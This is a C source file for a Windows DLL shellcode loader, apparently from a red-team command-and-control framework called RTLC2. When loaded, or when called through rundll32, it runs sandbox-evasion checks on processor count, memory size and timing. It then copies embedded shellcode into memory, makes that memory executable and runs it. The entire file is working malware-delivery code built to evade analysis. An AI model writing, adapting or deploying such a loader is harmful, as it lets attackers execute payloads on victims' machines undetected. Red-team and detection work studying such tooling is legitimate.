/* =========================================================================
 * RTLC2 Shellcode Loader - Windows DLL
 * DLL that executes embedded shellcode on load (DLL_PROCESS_ATTACH)
 * Compatible with rundll32: rundll32 loader.dll,Run
 * ========================================================================= */

#include <windows.h>

/* Shellcode data - generated by build script */
#include "shellcode_data.h"

/* ---- Evasion: Hardware checks ---- */
static int CheckHardware(void) {
    SYSTEM_INFO si;
    GetSystemInfo(&si);
    if (si.dwNumberOfProcessors < 2) return 0;

    MEMORYSTATUSEX ms;
    ms.dwLength = sizeof(ms);
    GlobalMemoryStatusEx(&ms);
    if (ms.ullTotalPhys < (DWORDLONG)2 * 1024 * 1024 * 1024) return 0;

    return 1;
}

/* ---- Evasion: Timing check ---- */
static int CheckTiming(void) {
    DWORD t1 = GetTickCount();
    HANDLE hEvent = CreateEventA(NULL, TRUE, FALSE, NULL);
    if (hEvent) {
        WaitForSingleObject(hEvent, 1500);
        CloseHandle(hEvent);
    }
    DWORD elapsed = GetTickCount() - t1;
    if (elapsed < 1000) return 0;
    return 1;
}

/* ---- Shellcode execution thread ---- */
static DWORD WINAPI ShellcodeThread(LPVOID param) {
    (void)param;

    /* Evasion checks inside thread (avoid loader lock issues) */
    if (!CheckHardware()) return 0;
    if (!CheckTiming())   return 0;

    /* Allocate RW memory */
    void *mem = VirtualAlloc(NULL, shellcode_len,
                             MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!mem) return 1;

    /* Copy shellcode */
    memcpy(mem, shellcode, shellcode_len);

    /* Change to RX */
    DWORD oldProt;
    VirtualProtect(mem, shellcode_len, PAGE_EXECUTE_READ, &oldProt);

    /* Execute */
    ((void (*)(void))mem)();

    VirtualFree(mem, 0, MEM_RELEASE);
    return 0;
}

/* ---- DLL Entry Point ---- */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
    (void)hinstDLL;
    (void)lpReserved;

    if (fdwReason == DLL_PROCESS_ATTACH) {
        /* Create thread to avoid loader lock deadlock */
        HANDLE hThread = CreateThread(NULL, 0, ShellcodeThread, NULL, 0, NULL);
        if (hThread) CloseHandle(hThread);
    }
    return TRUE;
}

/* ---- Exported function for rundll32 compatibility ---- */
__declspec(dllexport) void Run(void) {
    ShellcodeThread(NULL);
}
